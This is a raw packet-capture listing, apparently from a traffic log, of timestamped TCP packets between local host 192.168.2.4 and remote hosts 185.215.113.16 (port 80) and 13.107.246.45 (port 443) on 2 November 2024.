                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287679911 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287694931 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287703991 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287704945 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287715912 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287729979 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287746906 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287754059 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287756920 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287791967 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287795067 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287823915 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287833929 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287838936 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287863970 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287899971 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287911892 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287920952 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287933111 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287945032 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287950039 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287955999 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287966967 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287969112 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.287998915 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288016081 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288017035 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288027048 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288041115 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288050890 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288054943 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288067102 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288079977 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288113117 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288243055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288253069 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288263083 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288275957 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288285017 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288286924 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288296938 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288309097 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288310051 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288321018 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288347006 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288347006 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288381100 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288383961 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288402081 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288412094 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288424015 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288434982 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288441896 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288444996 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288458109 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288467884 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288466930 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288479090 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288486004 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288487911 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288503885 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288506985 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288516998 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288526058 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288535118 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288543940 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288554907 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288554907 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288567066 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288573027 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288578033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288589001 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288594007 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288629055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288633108 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288633108 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288640976 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288650036 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288666964 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.288700104 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.313652039 CET4436386813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.313734055 CET4436386813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.313808918 CET63868443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.318242073 CET63868443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.318272114 CET4436386813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.318298101 CET63868443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.318315029 CET4436386813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.325906038 CET63874443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.325926065 CET4436387413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.326189041 CET63874443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329251051 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329263926 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329274893 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329284906 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329298019 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329308033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329309940 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329319954 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329332113 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329333067 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329344988 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329353094 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329355955 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329377890 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329377890 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329386950 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329396963 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329437971 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329483986 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329493999 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329504013 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329516888 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329526901 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329526901 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329561949 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329561949 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329561949 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329571009 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329581022 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329602003 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329613924 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329615116 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329627037 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329633951 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329643965 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329663992 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329668045 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329674006 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329683065 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329694033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329701900 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329709053 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329734087 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329735041 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329823971 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329834938 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329852104 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329862118 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329866886 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329874039 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329885006 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329886913 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329902887 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.329924107 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330002069 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330040932 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330049992 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330066919 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330075979 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330085993 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330086946 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330105066 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330111980 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330111980 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330115080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330126047 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330147028 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330151081 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330151081 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330157042 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330168962 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330188036 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330199003 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330209017 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330219030 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330265999 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330265999 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330399990 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330480099 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330491066 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330502033 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330540895 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330540895 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330574989 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330579996 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330598116 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330609083 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330617905 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330626965 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330629110 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330637932 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330652952 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330652952 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330653906 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330667019 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330672979 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330677032 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330688953 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330691099 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330698013 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330708981 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330715895 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330729008 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330734015 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330734968 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330739021 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330751896 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330759048 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330773115 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330773115 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330785036 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330802917 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330812931 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330822945 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330832958 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330835104 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330847025 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330857038 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330859900 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330861092 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330878973 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330902100 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330912113 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330915928 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330923080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330944061 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.330960035 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331043005 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331053972 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331063986 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331088066 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331118107 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331233025 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331245899 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331257105 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331269979 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331279039 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331290960 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331290960 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331291914 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331348896 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331348896 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331423044 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331434011 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331444025 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331454039 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331471920 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331480026 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331480026 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331481934 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331492901 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331504107 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331511021 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331511021 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331521988 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331532001 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331532001 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331542969 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331554890 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331558943 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331558943 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331572056 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331578016 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331598043 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331614971 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331615925 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331624985 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331634998 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331662893 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331672907 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331676006 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331676006 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331682920 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331707001 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331724882 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331744909 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331754923 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331763983 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331795931 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331809044 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331815958 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.331820965 CET8063862185.215.113.16192.168.2.4
